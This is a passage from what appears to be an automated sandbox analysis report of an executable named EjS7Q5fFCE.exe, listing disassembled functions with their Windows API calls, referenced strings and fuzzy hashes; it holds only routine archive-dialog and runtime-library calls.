                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1$xzG
                                                              • API String ID: 445417207-4215412680
                                                              • Opcode ID: dbae2d4dabea19576b2c0aa86efffb5a2dac8bf2961a68744b9bb0ad5b25f08f
                                                              • Instruction ID: cccde5518b3d4fd851fc1fb29c36d42c137fcdd417f4262990db2f3dd7247f7c
                                                              • Opcode Fuzzy Hash: dbae2d4dabea19576b2c0aa86efffb5a2dac8bf2961a68744b9bb0ad5b25f08f
                                                              • Instruction Fuzzy Hash: 0D110832A0012876DB119E64AC4DFFF376CEF1EB01F100166FB45B21C0C7A8990587E9
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 0043B6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0043B712
                                                              • DeleteObject.GDI32(00000000), ref: 0043B744
                                                              • DeleteObject.GDI32(00000000), ref: 0043B767
                                                                • Part of subcall function 0043A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0043B73D,00000066), ref: 0043A6D5
                                                                • Part of subcall function 0043A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A6EC
                                                                • Part of subcall function 0043A6C2: LoadResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A703
                                                                • Part of subcall function 0043A6C2: LockResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A712
                                                                • Part of subcall function 0043A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0043B73D,00000066), ref: 0043A72D
                                                                • Part of subcall function 0043A6C2: GlobalLock.KERNEL32(00000000), ref: 0043A73E
                                                                • Part of subcall function 0043A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0043A762
                                                                • Part of subcall function 0043A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0043A7A7
                                                                • Part of subcall function 0043A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0043A7C6
                                                                • Part of subcall function 0043A6C2: GlobalFree.KERNEL32(00000000), ref: 0043A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: 808343db1ca8a42f13d0d4bc52d58909e6c5d38f288ddc7126853a034075f62b
                                                              • Instruction ID: 0ee3e3c2779114925c11bca28d621d06e8abd4c197010d8ca1ea3aca25e9bbef
                                                              • Opcode Fuzzy Hash: 808343db1ca8a42f13d0d4bc52d58909e6c5d38f288ddc7126853a034075f62b
                                                              • Instruction Fuzzy Hash: 2B01263254010167C7117B748C0AB7F7AB9EFC9B56F18102AFA40B7395DF298D1542AA
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043D64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0043D661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0043D675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0043D684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 15be2547779958ac568ec9d885ccc854feda616fc5a6844b3d563931f3e7e276
                                                              • Instruction ID: cf9b9b1dc795a5fd73cf3ef14f0fe864b1934ee8387094fbdd145aa3a0fe16b0
                                                              • Opcode Fuzzy Hash: 15be2547779958ac568ec9d885ccc854feda616fc5a6844b3d563931f3e7e276
                                                              • Instruction Fuzzy Hash: 40012833A44210BBD2114F64BD0AF6B776DFB9EF02F110436F705A61D0C6AA99098B7E
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00447E24,00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002), ref: 00447E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00447EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00447E24,00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002), ref: 00447EC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: f9be3f533eea28d086c2fa4e7dc90b34aeb33c82dbbb3bc6f28417b85c247a51
                                                              • Instruction ID: ea85674d5894720c0beae45694c5904a1776482a0f8b104b80662e66bfbf7d5d
                                                              • Opcode Fuzzy Hash: f9be3f533eea28d086c2fa4e7dc90b34aeb33c82dbbb3bc6f28417b85c247a51
                                                              • Instruction Fuzzy Hash: 0EF04F31A00308BBDB119FA1DC09B9EBFB4EB44757F1141AAF805A22A1DB34DE45CA98
                                                              APIs
                                                                • Part of subcall function 0043081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                                • Part of subcall function 0043081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0042F2E4
                                                              • GetProcAddress.KERNEL32(004681C8,CryptUnprotectMemory), ref: 0042F2F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 3f5ed62d2afd1520dc0054e275eb69f00d2d62e464b2e443ea8a1d69eedbd7ef
                                                              • Instruction ID: c1ba67201d956e893cd9cb56e4bd004a9f2dc1441cc1ac3c314b2bae6a08bf8d
                                                              • Opcode Fuzzy Hash: 3f5ed62d2afd1520dc0054e275eb69f00d2d62e464b2e443ea8a1d69eedbd7ef
                                                              • Instruction Fuzzy Hash: 68E026319007119FC7209F38A80CB037AE46F04B4BF20883FF8DA93282C6BCD8448B18
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: e1af721194bc670ae3f948520727ef6e23f27cffb9c0fa51939cfe79af72a886
                                                              • Instruction ID: cfcd3821fae4f6a54afe8e9f19beab241c5ae8078ccb40633bd78b8879294d23
                                                              • Opcode Fuzzy Hash: e1af721194bc670ae3f948520727ef6e23f27cffb9c0fa51939cfe79af72a886
                                                              • Instruction Fuzzy Hash: 6D51CFB1900212AFFB288F15DA85B6AB3A4BF54305F64402FF801576A1D7B9AD41D798
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044BF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044BF5C
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044BF82
                                                              • _free.LIBCMT ref: 0044BF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044BFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 1449a996f7cd179b53ee26478cbfb1734d0751b5c0d5d9c506932e9c87db7766
                                                              • Instruction ID: d957273b222065889ae52f2c5f7f3e8c4ab36bdb365fdd3b237eec48fea25d3a
                                                              • Opcode Fuzzy Hash: 1449a996f7cd179b53ee26478cbfb1734d0751b5c0d5d9c506932e9c87db7766
                                                              • Instruction Fuzzy Hash: 5901D4726017117F37211ABB5C4CC7B6A6DDEC2BAA324012EF908C3202EF68CD0695F8
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,004491AD,0044B188,?,00449813,00000001,00000364,?,00443F73,00000050,?,00461030,00000200), ref: 0044986E
                                                              • _free.LIBCMT ref: 004498A3
                                                              • _free.LIBCMT ref: 004498CA
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 004498D7
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 004498E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 8f2a31d42377b30815483ae24049a24142e44326ed754ebaeacaccd640edc9dc
                                                              • Instruction ID: 0c8c68428d1917263590d2932584e596c1469de9410d1bec006952a496f4c3fe
                                                              • Opcode Fuzzy Hash: 8f2a31d42377b30815483ae24049a24142e44326ed754ebaeacaccd640edc9dc
                                                              • Instruction Fuzzy Hash: 500121321A07016BB312772A6C8991B252ADFD27AA734013BF41092293EE2CCD02622D
                                                              APIs
                                                                • Part of subcall function 004311CF: ResetEvent.KERNEL32(?), ref: 004311E1
                                                                • Part of subcall function 004311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004311F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00430F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00430F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00430F54
                                                              • CloseHandle.KERNEL32(?), ref: 00430F60
                                                              • CloseHandle.KERNEL32(?), ref: 00430F6C
                                                                • Part of subcall function 00430FE4: WaitForSingleObject.KERNEL32(?,000000FF,00431206,?), ref: 00430FEA
                                                                • Part of subcall function 00430FE4: GetLastError.KERNEL32(?), ref: 00430FF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: c9bacbcb0d94a4237604ba025a7fc8c6fc3f73d5c554c6296987a507abdb518c
                                                              • Instruction ID: 53595dd02a0a5acb8bdd26c106b6aa70cd04b622ddde3f78357202576a3d5cb1
                                                              • Opcode Fuzzy Hash: c9bacbcb0d94a4237604ba025a7fc8c6fc3f73d5c554c6296987a507abdb518c
                                                              • Instruction Fuzzy Hash: 98017571100B44EFC7229F64DD84BC6FBA9FB08B52F00092EF15B521A5C7B5BA54CB58
                                                              APIs
                                                              • _free.LIBCMT ref: 0044C817
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 0044C829
                                                              • _free.LIBCMT ref: 0044C83B
                                                              • _free.LIBCMT ref: 0044C84D
                                                              • _free.LIBCMT ref: 0044C85F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: c04c466634066f2ff46a934b17603eb81bb84784741351e84f5e018367963190
                                                              • Instruction ID: 80854a4d745ac3800a2569bcc6fd193e240cb305436a7a6b3c7625e2e26fad42
                                                              • Opcode Fuzzy Hash: c04c466634066f2ff46a934b17603eb81bb84784741351e84f5e018367963190
                                                              • Instruction Fuzzy Hash: 08F06872912200ABA654EB66E5C6C0B73E9AA107167580C2FF104D7653CF78FC40C65C
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00431FE5
                                                              • _wcslen.LIBCMT ref: 00431FF6
                                                              • _wcslen.LIBCMT ref: 00432006
                                                              • _wcslen.LIBCMT ref: 00432014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0042B371,?,?,00000000,?,?,?), ref: 0043202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 2594d0998a91d66ae33886c19406942d4ae4f02fe36dd6ef8c17ff3d8e6668f6
                                                              • Instruction ID: 1993a8b2b0c02ed154f79c8ba96d7b11402a49e5ed9f2418f4fccda91984e224
                                                              • Opcode Fuzzy Hash: 2594d0998a91d66ae33886c19406942d4ae4f02fe36dd6ef8c17ff3d8e6668f6
                                                              • Instruction Fuzzy Hash: 6AF09032008114BFDF261F51EC09DCE3F26EB45B76F21801AF62A5B061CB72DA65D6D8
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: 6421715aed9561ebb90af71700606af0f7f7fb08664f50b72e8f81c322f9c890
                                                              • Instruction ID: 093e2c702aec9418d01e6a103aaf5072598a1415ae3519ec3608f203ddd7c6bf
                                                              • Opcode Fuzzy Hash: 6421715aed9561ebb90af71700606af0f7f7fb08664f50b72e8f81c322f9c890
                                                              • Instruction Fuzzy Hash: 9F510D35388300F7E62526D18D47F367255AB0CB08F24650BF787690F1CAAF94226B1F
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\EjS7Q5fFCE.exe,00000104), ref: 00447FAE
                                                              • _free.LIBCMT ref: 00448079
                                                              • _free.LIBCMT ref: 00448083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                              • API String ID: 2506810119-1756468577
                                                              • Opcode ID: d5c93ad65ed9957763dbac393a8e824a974159637ab22489d0a50a365645f7bc
                                                              • Instruction ID: aa82af9296b97ebcac54acc4224a09ad7d5389c4afc68abbcdeff20df1318fe9
                                                              • Opcode Fuzzy Hash: d5c93ad65ed9957763dbac393a8e824a974159637ab22489d0a50a365645f7bc
                                                              • Instruction Fuzzy Hash: 2631A2B1A00208AFEB21DF99D88099EBBF8EB95314F11406FF504A7211DBB58E45CB59
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004431FB
                                                              • _abort.LIBCMT ref: 00443306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: 1eedd4f9345ef8d7a93c0f94979a8df8883fbc729a6ff25b38022c69ee1c161e
                                                              • Instruction ID: 59f4ae9dabd18822627ffe1aa1d97eb133015ec0aad7b3dc1fa6301c693ca18c
                                                              • Opcode Fuzzy Hash: 1eedd4f9345ef8d7a93c0f94979a8df8883fbc729a6ff25b38022c69ee1c161e
                                                              • Instruction Fuzzy Hash: 7D418D71900209AFEF15DF94CD82AEEBBB5FF48705F14809AF90467212D379EA50DB58
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00427406
                                                                • Part of subcall function 00423BBA: __EH_prolog.LIBCMT ref: 00423BBF
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004274CD
                                                                • Part of subcall function 00427A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00427AAB
                                                                • Part of subcall function 00427A9C: GetLastError.KERNEL32 ref: 00427AF1
                                                                • Part of subcall function 00427A9C: CloseHandle.KERNEL32(?), ref: 00427B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              • Opcode ID: 4f5c59201ed98a5e2ac0806c9a2277db92faba1bc3907c52dfac8c0b3558b7e2
                                                              • Instruction ID: f72dbcc60d4ffe00f5da36e54d6a2e501e3171aafd9a502ddb31c8baf49d9e3c
                                                              • Opcode Fuzzy Hash: 4f5c59201ed98a5e2ac0806c9a2277db92faba1bc3907c52dfac8c0b3558b7e2
                                                              • Instruction Fuzzy Hash: 1431D771F04268BADF11EFA5AC45BEFBB78AF09308F44401BF404A7292D77C4A848769
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043AD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0043ADAD
